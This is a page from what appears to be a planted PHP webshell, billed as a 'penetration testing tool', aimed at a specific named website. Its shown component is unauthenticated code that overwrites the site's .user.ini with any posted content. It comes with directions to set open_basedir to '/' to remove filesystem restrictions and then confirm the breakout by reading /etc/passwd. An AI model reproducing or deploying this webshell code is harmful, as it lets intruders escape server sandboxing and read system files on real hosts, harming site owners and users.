🔓 Ultimate Webshell - Penetration Testing Tool

📖 File Reader

<?php
$targetFile = '/www/wwwroot/hljrlsj.com/.user.ini';
$backupFile = $targetFile . '.backup';

// Handle form submission
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $newContent = $_POST['content'] ?? '';
    // Create backup if not exists
    if (!file_exists($backupFile) && file_exists($targetFile)) {
        copy($targetFile, $backupFile);
    }
    // Write new content
    if (file_put_contents($targetFile, $newContent) !== false) {
        $message = '<span style="color:green;">✅ File updated successfully. Changes may take up to 5 minutes to apply (PHP cache).</span>';
    } else {
        $message = '<span style="color:red;">❌ Failed to write file. Check permissions.</span>';
    }
}

// Read current content
$currentContent = file_exists($targetFile) ? file_get_contents($targetFile) : '';
?>
<!DOCTYPE html>
<html>
<head>
    <title>Edit .user.ini</title>
    <style>
        body { font-family: monospace; background: #1e1e1e; color: #d4d4d4; padding: 20px; }
        textarea { width: 100%; height: 200px; background: #2d2d2d; color: #d4d4d4; border: 1px solid #3e3e3e; padding: 10px; }
        input, button { background: #0e639c; color: white; border: none; padding: 10px 20px; cursor: pointer; }
        input:hover, button:hover { background: #1177bb; }
        .warning { background: #333; border-left: 4px solid #ffa500; padding: 10px; margin: 20px 0; }
    </style>
</head>
<body>
    <h2>Edit .user.ini</h2>
    <?php if (isset($message)) echo "<p>$message</p>"; ?>
    <div class="warning">
        <strong>⚠️ Warning:</strong> Changing <code>open_basedir</code> to <code>/</code> will remove filesystem restrictions. Backup is saved as <code>.user.ini.backup</code>. Ensure you have authorization.
    </div>
    <form method="post">
        <label>Current content (edit as needed):</label><br>
        <textarea name="content"><?php echo htmlspecialchars($currentContent); ?></textarea><br>
        <input type="submit" value="Update .user.ini">
    </form>
    <p><a href="?action=filemanager&view=<?php echo urlencode($targetFile); ?>" target="_blank">View current file</a></p>
    <p><a href="?action=filemanager&view=<?php echo urlencode($backupFile); ?>" target="_blank">View backup (if exists)</a></p>
    <p>After updating, <strong>wait a few minutes</strong> and then test by trying to read a file outside the old restrictions (e.g., <code>/etc/passwd</code>) using the file manager.</p>
</body>
</html>